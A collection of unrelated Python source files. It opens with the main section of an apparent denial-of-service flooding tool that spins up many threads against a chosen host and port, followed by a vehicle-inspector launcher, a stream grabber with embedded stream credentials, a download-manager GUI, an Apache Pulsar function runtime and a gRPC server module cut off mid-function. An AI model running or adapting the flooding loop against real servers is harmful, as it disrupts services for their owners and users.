if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
#
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # daemon thread: dies when the main thread exits
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # daemon thread: dies when the main thread exits
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # reset the counter so it doesn't grow unbounded (avoids a memory crash)
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
print('I am not responsible for misuse of this tool')
|
vehicle-inspector.py | #! /usr/bin/env python
from smartcameras.subscriber import VehicleInspector
import threading
import time
def main():
print("########################################")
print ""
print("Welcome to the Vehicle Inspector!")
print ""
print("########################################")
vehicleInspector = VehicleInspector()
thread = threading.Thread(target=vehicleInspector.activate)
thread.daemon = True
thread.start()
while not vehicleInspector.isActive:
time.sleep(1)
print ""
print("The Vehicle Inspector has been activated!")
print ""
while True:
try:
raw_input("Press Ctrl+D to exit.")
except EOFError:
print ""
break
vehicleInspector.terminate()
thread.join()
print "Vehicle Inspector terminated."
print "Closing..."
if __name__ == "__main__":
main()
|
video_grabber.py | import cv2
import threading
class VideoGrabber():
sources_urls = {
"tvp:": "http://user:user@192.168.2.112:9981/stream/channel/28c32609c3e9143dff5dc1b0d16838cd?profile=mpeg",
"polsat": "http://user:user@192.168.2.112:9981/stream/channel/a5f47e2442e9d19f43dafb7b51c686a2?profile=mpeg",
"tvn": "http://user:user@192.168.2.112:9981/stream/channel/3679782872d6b7160b013fb8c0a9b393?profile=mpeg"
}
def __init__(self, scaling_factor=1):
self.scaling_factor = scaling_factor
self.frames = {} # latest frame per source name; per-instance so grabbers don't share state
def run(self):
for name, url in self.sources_urls.items():
thread = threading.Thread(target=self.run_source_thread, args=(name, url), daemon = True)
thread.start()
print(f"Thread: {name} started")
def run_source_thread(self, name, url):
cap = cv2.VideoCapture(url)
while True:
ret, frame = cap.read()
if frame is None:
continue
if self.scaling_factor > 1:
height, width, _ = frame.shape
new_height = height / self.scaling_factor
new_width = width / self.scaling_factor
frame = cv2.resize(frame, (int(new_width), int(new_height)))
self.frames[name] = frame
def is_ready(self):
return len(self.frames) == len(self.sources_urls)
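# Hedged usage sketch (not part of the original file): a caller might wait for
# every source thread to produce a frame, then show the latest one per stream.
def _demo_show_frames(grabber):
import time
while not grabber.is_ready():
time.sleep(0.1)
for name, frame in grabber.frames.items():
cv2.imshow(name, frame)
cv2.waitKey(1)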
|
NTGmutiTask.py | from os import kill
import total
import RPC_Thread
import tkinter.messagebox
import time
import threading
def pause(TaskID, part, count):
if part['text'] == '■':
part['text'] = '▶'
part.update()
total.RPC_down[count]['ispause'] = True
RPC_Thread.PauseTask(TaskID)
else:
part['text'] = '■'
part.update()
total.RPC_down[count]['ispause'] = False
RPC_Thread.StartTask(TaskID)
return 0
def pauseThread(TaskID, part, count):
Tpause = threading.Thread(target = pause, args= (TaskID, part, count))
Tpause.start()
return 0
def killTask(t1):
Tkill = threading.Thread(target = RPC_Thread.RemoveFile, args= (t1, ))
Tkill.start()
return 0
def change(stuff, page):
pageLimted = (page - 1) * 4 # index offset of the first task shown on this page
# continue only if there are enough tasks to reach this page
if len(total.RPC_down) >= pageLimted and page > 0:
stuff[1][1]['command'] = lambda t1 = '': print()
stuff[2][1]['command'] = lambda t1 = '': print()
stuff[3][1]['command'] = lambda t1 = '': print()
stuff[4][1]['command'] = lambda t1 = '': print()
stuff[1][2]['command'] = lambda t1 = '': print()
stuff[2][2]['command'] = lambda t1 = '': print()
stuff[3][2]['command'] = lambda t1 = '': print()
stuff[4][2]['command'] = lambda t1 = '': print()
if pageLimted + 4 <= len(total.RPC_down):
# a full page: exactly 4
countLen = 4
else:
# otherwise show however many tasks remain past the page offset
countLen = int(len(total.RPC_down) - pageLimted)
count = 1
while count <= countLen:
stuff[count][0]['text'] = 'Name:' + str(total.RPC_down[pageLimted+count]['name']) + '\n'+ str(total.RPC_down[pageLimted+count]['satuation']) + str(total.RPC_down[pageLimted+count]['total_size'])
if str(total.RPC_down[pageLimted+count]['satuation']) == '已删除': # 'Deleted'
stuff[count][1]['text'] = '■'
stuff[count][1]['command'] = lambda :print()
stuff[count][2]['command'] = lambda :print()
else:
# patch: keep the pause-button glyph in sync when switching pages
if total.RPC_down[pageLimted+count]['ispause'] == True:
stuff[count][1]['text'] = '▶'
else:
stuff[count][1]['text'] = '■'
stuff[count][1]['command'] = lambda t1 = total.RPC_down[pageLimted+count]['token'], t2 = stuff[count][1], t3 = pageLimted+count: pauseThread(t1, t2, t3)
stuff[count][2]['command'] = lambda t1 = total.RPC_down[pageLimted+count]['token']: killTask(t1)
count += 1
# reset the labels that have no task
while count <= 4:
stuff[count][0]['text'] = ''
stuff[count][1]['text'] = '■'
count += 1
stuff[1][0].update()
stuff[2][0].update()
stuff[3][0].update()
stuff[4][0].update()
else:
tkinter.messagebox.showerror('Error', 'That page does not exist')
return 0
def ThreadTask(stuff):
while True:
time.sleep(0.05)
count = 1
if len(total.RPC_down) != 0:
#count += 1
while count <= len(total.RPC_down):
RPC_Thread.GetDownSta(total.RPC_down[count]['token'], count)
count += 1
change(stuff, total.pageMutiTask)
change(stuff, total.pageMutiTask) |
python_instance.py | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -*- encoding: utf-8 -*-
"""python_instance.py: Python Instance for running python functions
"""
import base64
import os
import signal
import time
try:
import Queue as queue # Python 2
except ImportError:
import queue # Python 3
import threading
import sys
import re
import pulsar
import contextimpl
import Function_pb2
import log
import util
import InstanceCommunication_pb2
from functools import partial
from collections import namedtuple
from threading import Timer
from function_stats import Stats
Log = log.Log
# Equivalent of the InstanceConfig in Java
InstanceConfig = namedtuple('InstanceConfig', 'instance_id function_id function_version function_details max_buffered_tuples')
# This is the message that the consumers put on the queue for the function thread to process
InternalMessage = namedtuple('InternalMessage', 'message topic serde consumer')
InternalQuitMessage = namedtuple('InternalQuitMessage', 'quit')
DEFAULT_SERIALIZER = "serde.IdentitySerDe"
PY3 = sys.version_info[0] >= 3
def base64ify(bytes_or_str):
if PY3 and isinstance(bytes_or_str, str):
input_bytes = bytes_or_str.encode('utf8')
else:
input_bytes = bytes_or_str
output_bytes = base64.urlsafe_b64encode(input_bytes)
if PY3:
return output_bytes.decode('ascii')
else:
return output_bytes
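# Hedged aside (not in the original): base64ify() exists because
# urlsafe_b64encode returns bytes on Python 3 while message properties must be
# strings; decoding reverses it. A minimal sketch of the inverse:
def debase64ify(property_value):
"""Recover the original bytes from a base64ify()'d property string."""
return base64.urlsafe_b64decode(property_value.encode('ascii'))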
class PythonInstance(object):
def __init__(self, instance_id, function_id, function_version, function_details, max_buffered_tuples,
expected_healthcheck_interval, user_code, pulsar_client, secrets_provider, cluster_name):
self.instance_config = InstanceConfig(instance_id, function_id, function_version, function_details, max_buffered_tuples)
self.user_code = user_code
self.queue = queue.Queue(max_buffered_tuples)
self.log_topic_handler = None
if function_details.logTopic is not None and function_details.logTopic != "":
self.log_topic_handler = log.LogTopicHandler(str(function_details.logTopic), pulsar_client)
self.pulsar_client = pulsar_client
self.input_serdes = {}
self.consumers = {}
self.output_serde = None
self.function_class = None
self.function_purefunction = None
self.producer = None
self.execution_thread = None
self.atmost_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATMOST_ONCE')
self.atleast_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATLEAST_ONCE')
self.auto_ack = self.instance_config.function_details.autoAck
self.contextimpl = None
self.last_health_check_ts = time.time()
self.timeout_ms = function_details.source.timeoutMs if function_details.source.timeoutMs > 0 else None
self.expected_healthcheck_interval = expected_healthcheck_interval
self.secrets_provider = secrets_provider
self.metrics_labels = [function_details.tenant,
"%s/%s" % (function_details.tenant, function_details.namespace),
function_details.name,
instance_id, cluster_name,
"%s/%s/%s" % (function_details.tenant, function_details.namespace, function_details.name)]
self.stats = Stats(self.metrics_labels)
def health_check(self):
self.last_health_check_ts = time.time()
health_check_result = InstanceCommunication_pb2.HealthCheckResult()
health_check_result.success = True
return health_check_result
def process_spawner_health_check_timer(self):
if time.time() - self.last_health_check_ts > self.expected_healthcheck_interval * 3:
Log.critical("Haven't received health check from spawner in a while. Stopping instance...")
os.kill(os.getpid(), signal.SIGKILL)
sys.exit(1)
Timer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer).start()
def run(self):
# Setup consumers and input deserializers
mode = pulsar._pulsar.ConsumerType.Shared
if self.instance_config.function_details.source.subscriptionType == Function_pb2.SubscriptionType.Value("FAILOVER"):
mode = pulsar._pulsar.ConsumerType.Failover
subscription_name = str(self.instance_config.function_details.tenant) + "/" + \
str(self.instance_config.function_details.namespace) + "/" + \
str(self.instance_config.function_details.name)
for topic, serde in self.instance_config.function_details.source.topicsToSerDeClassName.items():
if not serde:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), serde)
self.input_serdes[topic] = serde_kclass()
Log.debug("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
for topic, consumer_conf in self.instance_config.function_details.source.inputSpecs.items():
if not consumer_conf.serdeClassName:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), consumer_conf.serdeClassName)
self.input_serdes[topic] = serde_kclass()
Log.debug("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
if consumer_conf.isRegexPattern:
self.consumers[topic] = self.pulsar_client.subscribe(
re.compile(str(topic)), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
else:
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
function_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.className)
if function_kclass is None:
Log.critical("Could not import User Function Module %s" % self.instance_config.function_details.className)
raise NameError("Could not import User Function Module %s" % self.instance_config.function_details.className)
try:
self.function_class = function_kclass()
except:
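# not instantiable as a class; fall back to treating it as a plain function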
self.function_purefunction = function_kclass
self.contextimpl = contextimpl.ContextImpl(self.instance_config, Log, self.pulsar_client,
self.user_code, self.consumers,
self.secrets_provider, self.metrics_labels)
# Now launch a thread that does execution
self.execution_thread = threading.Thread(target=self.actual_execution)
self.execution_thread.start()
# start proccess spawner health check timer
self.last_health_check_ts = time.time()
if self.expected_healthcheck_interval > 0:
Timer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer).start()
def actual_execution(self):
Log.debug("Started Thread for executing the function")
while True:
try:
msg = self.queue.get(True)
if isinstance(msg, InternalQuitMessage):
break
Log.debug("Got a message from topic %s" % msg.topic)
# deserialize message
input_object = msg.serde.deserialize(msg.message.data())
# set current message in context
self.contextimpl.set_current_message_context(msg.message, msg.topic)
output_object = None
self.saved_log_handler = None
if self.log_topic_handler is not None:
self.saved_log_handler = log.remove_all_handlers()
log.add_handler(self.log_topic_handler)
successfully_executed = False
try:
# get user function start time for statistic calculation
self.stats.set_last_invocation(time.time())
# start timer for process time
self.stats.process_time_start()
if self.function_class is not None:
output_object = self.function_class.process(input_object, self.contextimpl)
else:
output_object = self.function_purefunction.process(input_object)
successfully_executed = True
# stop timer for process time
self.stats.process_time_end()
except Exception as e:
Log.exception("Exception while executing user method")
self.stats.incr_total_user_exceptions(e)
if self.log_topic_handler is not None:
log.remove_all_handlers()
log.add_handler(self.saved_log_handler)
if successfully_executed:
self.process_result(output_object, msg)
self.stats.incr_total_processed_successfully()
except Exception as e:
Log.error("Uncaught exception in Python instance: %s" % e);
self.stats.incr_total_sys_exceptions(e)
def done_producing(self, consumer, orig_message, result, sent_message):
if result == pulsar.Result.Ok and self.auto_ack and self.atleast_once:
consumer.acknowledge(orig_message)
def process_result(self, output, msg):
if output is not None and self.instance_config.function_details.sink.topic is not None and \
len(self.instance_config.function_details.sink.topic) > 0:
if self.output_serde is None:
self.setup_output_serde()
if self.producer is None:
self.setup_producer()
# serialize function output
output_bytes = self.output_serde.serialize(output)
if output_bytes is not None:
props = {"__pfn_input_topic__" : str(msg.topic), "__pfn_input_msg_id__" : base64ify(msg.message.message_id().serialize())}
self.producer.send_async(output_bytes, partial(self.done_producing, msg.consumer, msg.message), properties=props)
elif self.auto_ack and self.atleast_once:
msg.consumer.acknowledge(msg.message)
def setup_output_serde(self):
if self.instance_config.function_details.sink.serDeClassName is not None and \
len(self.instance_config.function_details.sink.serDeClassName) > 0:
serde_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.sink.serDeClassName)
self.output_serde = serde_kclass()
else:
global DEFAULT_SERIALIZER
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
self.output_serde = serde_kclass()
def setup_producer(self):
if self.instance_config.function_details.sink.topic is not None and \
len(self.instance_config.function_details.sink.topic) > 0:
Log.debug("Setting up producer for topic %s" % self.instance_config.function_details.sink.topic)
self.producer = self.pulsar_client.create_producer(
str(self.instance_config.function_details.sink.topic),
block_if_queue_full=True,
batching_enabled=True,
batching_max_publish_delay_ms=1,
max_pending_messages=100000)
def message_listener(self, serde, consumer, message):
# increment number of received records from source
self.stats.incr_total_received()
item = InternalMessage(message, consumer.topic(), serde, consumer)
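# put() blocks once max_buffered_tuples items are queued, applying
# backpressure to Pulsar's listener thread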
self.queue.put(item, True)
if self.atmost_once and self.auto_ack:
consumer.acknowledge(message)
def get_and_reset_metrics(self):
# First get any user metrics
metrics = self.get_metrics()
self.reset_metrics()
return metrics
def reset_metrics(self):
self.stats.reset()
self.contextimpl.reset_metrics()
def get_metrics(self):
total_received = self.stats.get_total_received()
total_processed_successfully = self.stats.get_total_processed_successfully()
total_user_exceptions = self.stats.get_total_user_exceptions()
total_sys_exceptions = self.stats.get_total_sys_exceptions()
avg_process_latency_ms = self.stats.get_avg_process_latency()
last_invocation = self.stats.get_last_invocation()
total_received_1min = self.stats.get_total_received_1min()
total_processed_successfully_1min = self.stats.get_total_processed_successfully_1min()
total_user_exceptions_1min = self.stats.get_total_user_exceptions_1min()
total_sys_exceptions_1min = self.stats.get_total_sys_exceptions_1min()
avg_process_latency_ms_1min = self.stats.get_avg_process_latency_1min()
metrics_data = InstanceCommunication_pb2.MetricsData()
# total metrics
metrics_data.receivedTotal = int(total_received) if sys.version_info.major >= 3 else long(total_received)
metrics_data.processedSuccessfullyTotal = int(total_processed_successfully) if sys.version_info.major >= 3 else long(total_processed_successfully)
metrics_data.systemExceptionsTotal = int(total_sys_exceptions) if sys.version_info.major >= 3 else long(total_sys_exceptions)
metrics_data.userExceptionsTotal = int(total_user_exceptions) if sys.version_info.major >= 3 else long(total_user_exceptions)
metrics_data.avgProcessLatency = avg_process_latency_ms
metrics_data.lastInvocation = int(last_invocation) if sys.version_info.major >= 3 else long(last_invocation)
# 1min metrics
metrics_data.receivedTotal_1min = int(total_received_1min) if sys.version_info.major >= 3 else long(total_received_1min)
metrics_data.processedSuccessfullyTotal_1min = int(
total_processed_successfully_1min) if sys.version_info.major >= 3 else long(total_processed_successfully_1min)
metrics_data.systemExceptionsTotal_1min = int(total_sys_exceptions_1min) if sys.version_info.major >= 3 else long(
total_sys_exceptions_1min)
metrics_data.userExceptionsTotal_1min = int(total_user_exceptions_1min) if sys.version_info.major >= 3 else long(
total_user_exceptions_1min)
metrics_data.avgProcessLatency_1min = avg_process_latency_ms_1min
# get any user metrics
user_metrics = self.contextimpl.get_metrics()
for metric_name, value in user_metrics.items():
metrics_data.userMetrics[metric_name] = value
return metrics_data
def add_system_metrics(self, metric_name, value, metrics):
metrics.metrics[metric_name].count = value
metrics.metrics[metric_name].sum = value
metrics.metrics[metric_name].min = 0
metrics.metrics[metric_name].max = value
def get_function_status(self):
status = InstanceCommunication_pb2.FunctionStatus()
status.running = True
total_received = self.stats.get_total_received()
total_processed_successfully = self.stats.get_total_processed_successfully()
total_user_exceptions = self.stats.get_total_user_exceptions()
total_sys_exceptions = self.stats.get_total_sys_exceptions()
avg_process_latency_ms = self.stats.get_avg_process_latency()
last_invocation = self.stats.get_last_invocation()
status.numReceived = int(total_received) if sys.version_info.major >= 3 else long(total_received)
status.numSuccessfullyProcessed = int(total_processed_successfully) if sys.version_info.major >= 3 else long(total_processed_successfully)
status.numUserExceptions = int(total_user_exceptions) if sys.version_info.major >= 3 else long(total_user_exceptions)
status.instanceId = self.instance_config.instance_id
for ex, tm in self.stats.latest_user_exception:
to_add = status.latestUserExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.numSystemExceptions = int(total_sys_exceptions) if sys.version_info.major >= 3 else long(total_sys_exceptions)
for ex, tm in self.stats.latest_sys_exception:
to_add = status.latestSystemExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.averageLatency = avg_process_latency_ms
status.lastInvocationTime = int(last_invocation) if sys.version_info.major >= 3 else long(last_invocation)
return status
def join(self):
self.queue.put(InternalQuitMessage(True), True)
self.execution_thread.join()
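# --- Illustrative sketch (added; not part of the original module) -----------
# A self-contained model of the sentinel-shutdown pattern that join() above
# relies on: a worker drains a queue until it sees a quit message. All names
# below are assumptions for this sketch only, not Pulsar APIs.
import threading as _demo_threading
try:
    import queue as _demo_queue  # Python 3
except ImportError:
    import Queue as _demo_queue  # Python 2

class _DemoQuitMessage(object):
    pass

def _demo_sentinel_shutdown():
    work_queue = _demo_queue.Queue()
    processed = []

    def drain():
        while True:
            item = work_queue.get(True)
            if isinstance(item, _DemoQuitMessage):
                break
            processed.append(item)

    worker = _demo_threading.Thread(target=drain)
    worker.start()
    for i in range(3):
        work_queue.put(i, True)
    # the sentinel plays the role of InternalQuitMessage in join() above
    work_queue.put(_DemoQuitMessage(), True)
    worker.join()
    assert processed == [0, 1, 2]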
|
_server_adaptations.py | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Translates gRPC's server-side API into gRPC's server-side Beta API."""
import collections
import threading
import grpc
from grpc import _common
from grpc.beta import interfaces
from grpc.framework.common import cardinality
from grpc.framework.common import style
from grpc.framework.foundation import abandonment
from grpc.framework.foundation import logging_pool
from grpc.framework.foundation import stream
from grpc.framework.interfaces.face import face
_DEFAULT_POOL_SIZE = 8
class _ServerProtocolContext(interfaces.GRPCServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def peer(self):
return self._servicer_context.peer()
def disable_next_response_compression(self):
pass # TODO(https://github.com/grpc/grpc/issues/4078): design, implement.
class _FaceServicerContext(face.ServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def is_active(self):
return self._servicer_context.is_active()
def time_remaining(self):
return self._servicer_context.time_remaining()
def add_abortion_callback(self, abortion_callback):
raise NotImplementedError(
'add_abortion_callback no longer supported server-side!')
def cancel(self):
self._servicer_context.cancel()
def protocol_context(self):
return _ServerProtocolContext(self._servicer_context)
def invocation_metadata(self):
return _common.cygrpc_metadata(
self._servicer_context.invocation_metadata())
def initial_metadata(self, initial_metadata):
self._servicer_context.send_initial_metadata(initial_metadata)
def terminal_metadata(self, terminal_metadata):
self._servicer_context.set_terminal_metadata(terminal_metadata)
def code(self, code):
self._servicer_context.set_code(code)
def details(self, details):
self._servicer_context.set_details(details)
def _adapt_unary_request_inline(unary_request_inline):
def adaptation(request, servicer_context):
return unary_request_inline(request,
_FaceServicerContext(servicer_context))
return adaptation
def _adapt_stream_request_inline(stream_request_inline):
def adaptation(request_iterator, servicer_context):
return stream_request_inline(request_iterator,
_FaceServicerContext(servicer_context))
return adaptation
class _Callback(stream.Consumer):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._terminated = False
self._cancelled = False
def consume(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def terminate(self):
with self._condition:
self._terminated = True
self._condition.notify_all()
def consume_and_terminate(self, value):
with self._condition:
self._values.append(value)
self._terminated = True
self._condition.notify_all()
def cancel(self):
with self._condition:
self._cancelled = True
self._condition.notify_all()
def draw_one_value(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._values:
return self._values.pop(0)
elif self._terminated:
return None
else:
self._condition.wait()
def draw_all_values(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._terminated:
all_values = tuple(self._values)
self._values = None
return all_values
else:
self._condition.wait()
def _run_request_pipe_thread(request_iterator, request_consumer,
servicer_context):
thread_joined = threading.Event()
def pipe_requests():
for request in request_iterator:
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.consume(request)
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.terminate()
def stop_request_pipe(timeout):
thread_joined.set()
request_pipe_thread = _common.CleanupThread(
stop_request_pipe, target=pipe_requests)
request_pipe_thread.start()
def _adapt_unary_unary_event(unary_unary_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_unary_event(request, callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
return callback.draw_all_values()[0]
return adaptation
def _adapt_unary_stream_event(unary_stream_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_stream_event(request, callback,
_FaceServicerContext(servicer_context))
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
def _adapt_stream_unary_event(stream_unary_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_unary_event(
callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
return callback.draw_all_values()[0]
return adaptation
def _adapt_stream_stream_event(stream_stream_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_stream_event(
callback, _FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
class _SimpleMethodHandler(
collections.namedtuple('_MethodHandler', (
'request_streaming',
'response_streaming',
'request_deserializer',
'response_serializer',
'unary_unary',
'unary_stream',
'stream_unary',
'stream_stream',)), grpc.RpcMethodHandler):
pass
def _simple_method_handler(implementation, request_deserializer,
response_serializer):
if implementation.style is style.Service.INLINE:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(
False, False, request_deserializer, response_serializer,
_adapt_unary_request_inline(implementation.unary_unary_inline),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(
False, True, request_deserializer, response_serializer, None,
_adapt_unary_request_inline(implementation.unary_stream_inline),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(True, False, request_deserializer,
response_serializer, None, None,
_adapt_stream_request_inline(
implementation.stream_unary_inline),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_request_inline(
implementation.stream_stream_inline))
elif implementation.style is style.Service.EVENT:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(
False, False, request_deserializer, response_serializer,
_adapt_unary_unary_event(implementation.unary_unary_event),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(
False, True, request_deserializer, response_serializer, None,
_adapt_unary_stream_event(implementation.unary_stream_event),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(
True, False, request_deserializer, response_serializer, None,
None,
_adapt_stream_unary_event(implementation.stream_unary_event),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_stream_event(implementation.stream_stream_event))
def _flatten_method_pair_map(method_pair_map):
method_pair_map = method_pair_map or {}
flat_map = {}
for method_pair in method_pair_map:
method = _common.fully_qualified_method(method_pair[0], method_pair[1])
flat_map[method] = method_pair_map[method_pair]
return flat_map
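# Illustrative note (added): assuming _common.fully_qualified_method joins a
# (group, method) pair gRPC-style, the flattening above behaves like:
#
#     _flatten_method_pair_map({('pkg.Service', 'Method'): handler})
#     => {'/pkg.Service/Method': handler}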
class _GenericRpcHandler(grpc.GenericRpcHandler):
def __init__(self, method_implementations, multi_method_implementation,
request_deserializers, response_serializers):
self._method_implementations = _flatten_method_pair_map(
method_implementations)
self._request_deserializers = _flatten_method_pair_map(
request_deserializers)
self._response_serializers = _flatten_method_pair_map(
response_serializers)
self._multi_method_implementation = multi_method_implementation
def service(self, handler_call_details):
method_implementation = self._method_implementations.get(
handler_call_details.method)
if method_implementation is not None:
return _simple_method_handler(
method_implementation,
self._request_deserializers.get(handler_call_details.method),
self._response_serializers.get(handler_call_details.method))
elif self._multi_method_implementation is None:
return None
else:
try:
return None #TODO(nathaniel): call the multimethod.
except face.NoSuchMethodError:
return None
class _Server(interfaces.Server):
def __init__(self, server):
self._server = server
def add_insecure_port(self, address):
return self._server.add_insecure_port(address)
def add_secure_port(self, address, server_credentials):
return self._server.add_secure_port(address, server_credentials)
def start(self):
self._server.start()
def stop(self, grace):
return self._server.stop(grace)
def __enter__(self):
self._server.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._server.stop(None)
return False
def server(service_implementations, multi_method_implementation,
request_deserializers, response_serializers, thread_pool,
thread_pool_size):
generic_rpc_handler = _GenericRpcHandler(
service_implementations, multi_method_implementation,
request_deserializers, response_serializers)
if thread_pool is None:
effective_thread_pool = logging_pool.pool(_DEFAULT_POOL_SIZE
if thread_pool_size is None
else thread_pool_size)
else:
effective_thread_pool = thread_pool
return _Server(
grpc.server(
effective_thread_pool, handlers=(generic_rpc_handler,)))
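# --- Illustrative sketch (added; not part of the original module) -----------
# A self-contained model of the callback-to-iterator bridge that _Callback
# implements above: values pushed from one thread are drained lazily as an
# iterator on another. Names below are assumptions for this sketch only.
import threading as _demo_threading

class _DemoBridge(object):
    def __init__(self):
        self._condition = _demo_threading.Condition()
        self._values = []
        self._done = False

    def push(self, value):
        with self._condition:
            self._values.append(value)
            self._condition.notify_all()

    def finish(self):
        with self._condition:
            self._done = True
            self._condition.notify_all()

    def __iter__(self):
        while True:
            with self._condition:
                while not self._values and not self._done:
                    self._condition.wait()
                if not self._values and self._done:
                    return
                value = self._values.pop(0)
            yield value  # yield outside the lock so producers are not blocked

def _demo_bridge():
    bridge = _DemoBridge()

    def produce():
        for i in range(3):
            bridge.push(i)
        bridge.finish()

    producer = _demo_threading.Thread(target=produce)
    producer.start()
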